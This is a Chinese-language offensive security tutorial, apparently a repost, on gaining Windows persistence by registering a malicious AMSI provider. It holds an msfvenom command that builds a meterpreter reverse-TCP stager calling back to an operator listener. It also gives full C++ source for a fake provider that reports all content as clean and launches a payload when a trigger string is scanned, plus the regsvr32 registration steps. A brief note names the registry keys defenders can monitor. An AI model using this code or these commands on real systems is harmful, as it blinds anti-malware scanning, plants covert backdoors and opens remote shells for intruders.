AMSI持久化


前言

AMSI（反恶意软件扫描接口）是 Windows 提供的一个接口：PowerShell 等脚本宿主在执行内容之前，会把内容交给已注册的反恶意软件提供程序扫描。提供程序的扫描通常是基于签名的，因此可以在执行任何脚本之前通过多种方法绕过。下文反过来利用这一机制：通过修改注册表注册一个自定义的 AMSI 提供程序，让它在每次扫描时检查触发字符串，从而建立持久化后门。注意：注册提供程序需要写入 HKLM，因此需要管理员权限；对防守方而言，HKLM\SOFTWARE\Microsoft\AMSI\Providers 下新增的 CLSID，以及其 InProcServer32 指向的未签名 DLL，都是值得监控的信号。

持久化操作

# Demo payload: a reverse-TCP stager; LHOST/LPORT are the operator's listener.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 -f exe > /home/test.exe

AMSI持久化

将生成的木马放入目标机

Microsoft 提供了用于 AMSI 提供程序测试的示例代码。该技术最初由 b4rtik 提出，并在其博客中发布了修改后的 Microsoft 代码。以下代码实现了一个假的 AMSI 提供程序：它对所有扫描内容都返回“未检测到”，并在扫描到触发字符串时启动 calc.exe。（注：注册步骤写入 HKLM，请在管理员权限的窗口中执行。）

下载链接: https://github.com/netbiosX/AMSI-Provider

如下操作

AMSI持久化

AMSI持久化

https://s2.loli.net/2022/02/11/LN2lyF1Qi6ht3ux.png

代码如下:

#include "stdafx.h"
#include <process.h>
#include <subauth.h>
#include <strsafe.h>
#include <amsi.h>
#include <windows.h>
#include <wrl/module.h>

using namespace Microsoft::WRL;

// Module handle captured in DllMain; DllRegisterServer uses it to resolve this DLL's on-disk path.
HMODULE g_currentModule;

// ntdll exports resolved at run time in Scan() via GetProcAddress.
typedef void (NTAPI* _RtlInitUnicodeString)(
PUNICODE_STRING DestinationString,
PCWSTR SourceString
)
;

typedef NTSYSAPI BOOLEAN(NTAPI* _RtlEqualUnicodeString)(
PUNICODE_STRING String1,
PUNICODE_STRING String2,
BOOLEAN CaseInsetive
)
;

// Thread body that launches the payload once Scan() sees a trigger string.
DWORD WINAPI MyThreadFunction(LPVOID lpParam);
// Declared but never defined or called anywhere in this listing.
void ErrorHandler(LPTSTR lpszFunction);

// DLL entry point: records the module handle for DllRegisterServer and
// brings the WRL in-proc COM module up on process attach and down on detach.
BOOL APIENTRY DllMain(HMODULE module, DWORD reason, LPVOID reserved)
{
    if (reason == DLL_PROCESS_ATTACH)
    {
        g_currentModule = module;
        // Per-thread attach/detach notifications are not needed.
        DisableThreadLibraryCalls(module);
        Module<InProc>::GetModule().Create();
    }
    else if (reason == DLL_PROCESS_DETACH)
    {
        Module<InProc>::GetModule().Terminate();
    }
    return TRUE;
}

#pragma region COM server boilerplate
// COM asks whether the DLL may be unloaded: S_OK only when the WRL module
// reports no outstanding object references.
HRESULT WINAPI DllCanUnloadNow()
{
    const bool noLiveObjects = Module<InProc>::GetModule().Terminate();
    return noLiveObjects ? S_OK : S_FALSE;
}

// COM class-factory lookup; the WRL module resolves rclsid to the class
// registered with CoCreatableClass below.
STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID FAR* ppv)
{
return Module<InProc>::GetModule().GetClassObject(rclsid, riid, ppv);
}
#pragma endregion

// The provider COM object. RuntimeClass/ClassicCom supplies IUnknown and
// class-factory plumbing; FtmBase makes it free-threaded (DllRegisterServer
// writes ThreadingModel=Both). The UUID below is the CLSID that gets listed
// under HKLM\Software\Microsoft\AMSI\Providers.
class
DECLSPEC_UUID("2E5D8A62-77F9-4F7B-A90C-2744820139B2")
PentestlabAmsiProvider : public RuntimeClass<RuntimeClassFlags<ClassicCom>, IAntimalwareProvider, FtmBase>
{
public:
// Called for every scan request; see the definition below.
IFACEMETHOD(Scan)(_In_ IAmsiStream * stream, _Out_ AMSI_RESULT * result) override;
// Session teardown notification; a no-op in this provider.
IFACEMETHOD_(void, CloseSession)(_In_ ULONGLONG session) override;
// Human-readable provider name reported to AMSI.
IFACEMETHOD(DisplayName)(_Outptr_ LPWSTR * displayName) override;

private:
// Carried over from the Microsoft sample; never read or written in this listing.
LONG m_requestNumber = 0;
};


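// IAntimalwareProvider::Scan. Every AMSI scan request from a process that
// loaded this provider lands here. The provider never blocks anything: it
// always reports AMSI_RESULT_NOT_DETECTED and, as a side effect, starts
// MyThreadFunction when the scanned content is exactly one of the trigger
// strings pentestlab, "pentestlab" or 'pentestlab' (case-insensitive).
//
// Fixes relative to the published listing:
//  - the attribute guards read `!SUCCEEDED(...) && actualSize == sizeof(...)`,
//    so a failed GetAttribute fell through and used an uninitialized
//    contentSize / contentAddress; they now bail on failure OR size mismatch.
//  - the quoted trigger literal had lost its escapes (`L""pentestlab""`);
//    restored to L"\"pentestlab\"".
//  - the HANDLE returned by CreateThread was leaked on every trigger.
//  - GetProcAddress results are checked before use.
HRESULT PentestlabAmsiProvider::Scan(_In_ IAmsiStream* stream, _Out_ AMSI_RESULT* result)
{
    // Default verdict for every path below: never flag content.
    *result = AMSI_RESULT_NOT_DETECTED;

    const HMODULE ntdll = GetModuleHandle(L"ntdll.dll");
    if (ntdll == nullptr)
    {
        return S_OK;
    }
    const auto RtlInitUnicodeString = reinterpret_cast<_RtlInitUnicodeString>(GetProcAddress(ntdll, "RtlInitUnicodeString"));
    const auto RtlEqualUnicodeString = reinterpret_cast<_RtlEqualUnicodeString>(GetProcAddress(ntdll, "RtlEqualUnicodeString"));
    if (RtlInitUnicodeString == nullptr || RtlEqualUnicodeString == nullptr)
    {
        return S_OK;
    }

    UNICODE_STRING trigger1;
    RtlInitUnicodeString(&trigger1, L"pentestlab");
    UNICODE_STRING trigger2;
    RtlInitUnicodeString(&trigger2, L"\"pentestlab\"");
    UNICODE_STRING trigger3;
    RtlInitUnicodeString(&trigger3, L"'pentestlab'");

    // Content length in bytes, then the address of the buffer being scanned.
    ULONG actualSize = 0;
    ULONGLONG contentSize = 0;
    if (FAILED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_SIZE, sizeof(contentSize), reinterpret_cast<PBYTE>(&contentSize), &actualSize)) ||
        actualSize != sizeof(contentSize))
    {
        return S_OK;
    }

    PBYTE contentAddress = nullptr;
    if (FAILED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_ADDRESS, sizeof(contentAddress), reinterpret_cast<PBYTE>(&contentAddress), &actualSize)) ||
        actualSize != sizeof(contentAddress))
    {
        return S_OK;
    }

    // Only short buffers are compared (the size is a byte count, so it fits a
    // USHORT here). The content is matched as-is against the UTF-16 triggers.
    if (contentAddress != nullptr && contentSize < 50)
    {
        UNICODE_STRING content;
        content.Buffer = reinterpret_cast<PWSTR>(contentAddress);
        content.Length = static_cast<USHORT>(contentSize);
        content.MaximumLength = static_cast<USHORT>(contentSize);

        const bool triggered = RtlEqualUnicodeString(&trigger1, &content, TRUE) ||
                               RtlEqualUnicodeString(&trigger2, &content, TRUE) ||
                               RtlEqualUnicodeString(&trigger3, &content, TRUE);
        if (triggered)
        {
            // Run the payload on its own thread so the scan returns promptly;
            // the handle is not needed afterwards, so release it immediately.
            DWORD threadId = 0;
            HANDLE thread = CreateThread(nullptr, 0, MyThreadFunction, nullptr, 0, &threadId);
            if (thread != nullptr)
            {
                CloseHandle(thread);
            }
        }
    }

    return S_OK;
}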

// No per-session state is kept, so session close notifications are ignored.
void PentestlabAmsiProvider::CloseSession(_In_ ULONGLONG session)
{

}

// Name AMSI reports for this provider. Returns a pointer to a static literal,
// exactly as the Microsoft sample does; nothing is allocated for the caller.
HRESULT PentestlabAmsiProvider::DisplayName(_Outptr_ LPWSTR* displayName)
{
*displayName = const_cast<LPWSTR>(L"Sample AMSI Provider");
return S_OK;
}

// Registers PentestlabAmsiProvider's class factory with the WRL in-proc module
// so DllGetClassObject can serve its CLSID.
CoCreatableClass(PentestlabAmsiProvider);

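// Payload thread started by Scan() when a trigger string is scanned.
// The proof of concept launches calc.exe; the article later swaps in the
// path of its msfvenom executable. Because this runs inside the scanning
// process, the child inherits that process's token and privileges.
// Fix relative to the published listing: the path literal had single
// backslashes (`\W`, `\S`, `\c` are not valid escapes and would not yield the
// intended path); they are now doubled.
DWORD WINAPI MyThreadFunction(LPVOID lpParam)
{
    UNREFERENCED_PARAMETER(lpParam);
    // system() goes through cmd.exe and blocks this thread until the child exits.
    system("c:\\Windows\\System32\\calc.exe");
    return 0;
}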


#pragma region Install / uninstall

// Writes a REG_SZ value (the string plus its terminating NUL) at key\subkey
// and maps the Win32 status to an HRESULT. A nullptr valueName targets the
// key's default value.
HRESULT SetKeyStringValue(_In_ HKEY key, _In_opt_ PCWSTR subkey, _In_opt_ PCWSTR valueName, _In_ PCWSTR stringValue)
{
    const DWORD byteCount = static_cast<DWORD>((wcslen(stringValue) + 1) * sizeof(wchar_t));
    const LONG status = RegSetKeyValue(key, subkey, valueName, REG_SZ, stringValue, byteCount);
    return HRESULT_FROM_WIN32(status);
}

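// regsvr32 entry point. Registers the class under HKLM\Software\Classes\CLSID
// as an in-proc COM server, then lists the CLSID under
// HKLM\Software\Microsoft\AMSI\Providers, which is what makes AMSI load this
// DLL into scanning processes from then on. Both writes go to HKLM, so
// regsvr32 must run elevated; otherwise the first RegSetKeyValue fails and
// its HRESULT is returned.
// Fixes relative to the published listing: the registry path literals had
// lost their backslash escaping (`\C`, `\M`, `\%` are not valid escapes) and
// are restored, and GetModuleFileName's 0-on-failure return is now an error.
STDAPI DllRegisterServer()
{
    wchar_t modulePath[MAX_PATH];
    const DWORD pathLen = GetModuleFileName(g_currentModule, modulePath, ARRAYSIZE(modulePath));
    if (pathLen == 0 || pathLen >= ARRAYSIZE(modulePath))
    {
        return E_UNEXPECTED;
    }

    wchar_t clsidString[40];
    if (StringFromGUID2(__uuidof(PentestlabAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0)
    {
        return E_UNEXPECTED;
    }

    wchar_t keyPath[200];
    HRESULT hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls", clsidString);
    if (FAILED(hr)) return hr;

    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"PentestlabAmsiProvider");
    if (FAILED(hr)) return hr;

    hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls\\InProcServer32", clsidString);
    if (FAILED(hr)) return hr;

    // The default value of InProcServer32 is the DLL path COM will load.
    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, modulePath);
    if (FAILED(hr)) return hr;

    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, L"ThreadingModel", L"Both");
    if (FAILED(hr)) return hr;

    // Register this CLSID as an anti-malware provider.
    hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Microsoft\\AMSI\\Providers\\%ls", clsidString);
    if (FAILED(hr)) return hr;

    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"PentestlabAmsiProvider");
    if (FAILED(hr)) return hr;

    return S_OK;
}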

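// regsvr32 /u entry point: removes the AMSI provider registration first, then
// the COM server registration, each with RegDeleteTree under HKLM (elevated).
// A missing key is treated as already-removed; any other error is returned.
// Fix relative to the published listing: the registry path literals had lost
// their backslash escaping (`\M`, `\A`, `\%`, `\C` are not valid escapes) and
// are restored.
STDAPI DllUnregisterServer()
{
    wchar_t clsidString[40];
    if (StringFromGUID2(__uuidof(PentestlabAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0)
    {
        return E_UNEXPECTED;
    }

    // Unregister this CLSID as an anti-malware provider.
    wchar_t keyPath[200];
    HRESULT hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Microsoft\\AMSI\\Providers\\%ls", clsidString);
    if (FAILED(hr)) return hr;
    LONG status = RegDeleteTree(HKEY_LOCAL_MACHINE, keyPath);
    if (status != NO_ERROR && status != ERROR_PATH_NOT_FOUND) return HRESULT_FROM_WIN32(status);

    // Unregister this CLSID as a COM server.
    hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls", clsidString);
    if (FAILED(hr)) return hr;
    status = RegDeleteTree(HKEY_LOCAL_MACHINE, keyPath);
    if (status != NO_ERROR && status != ERROR_PATH_NOT_FOUND) return HRESULT_FROM_WIN32(status);

    return S_OK;
}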
#pragma endregion

AMSI持久化

AMSI持久化

将上述代码编译为 AmsiProvider.dll，将其放入目标机的 C:\Windows\SysWOW64 目录下。注意 DLL 的位数应与要触发的进程一致：64 位 PowerShell 只会加载 64 位 DLL，并且一般需要用 64 位的 regsvr32 注册，否则注册信息可能落在 Wow6432Node 下而不被 64 位进程读取。

使用 regsvr32 程序向系统注册 AMSI 提供程序

# Run from an elevated prompt: DllRegisterServer writes under HKLM. Use the regsvr32 that matches the DLL's bitness.
regsvr32 AmsiProvider.dll

AMSI持久化

上图显示成功

然后本机监听端口

AMSI持久化

然后在目标机一个普通权限的 PowerShell 窗口中输入触发字符串 "pentestlab"。由于提供程序运行在发起扫描的进程内部，木马会以该 PowerShell 进程（即当前用户）的权限运行，而不是以注册时所用的管理员权限运行。

"pentestlab"

AMSI持久化

AMSI持久化

参考:https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/


原文始发于微信公众号(渗透安全团队):AMSI持久化

  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AMSI持久化http://cn-sec.com/archives/801875.html
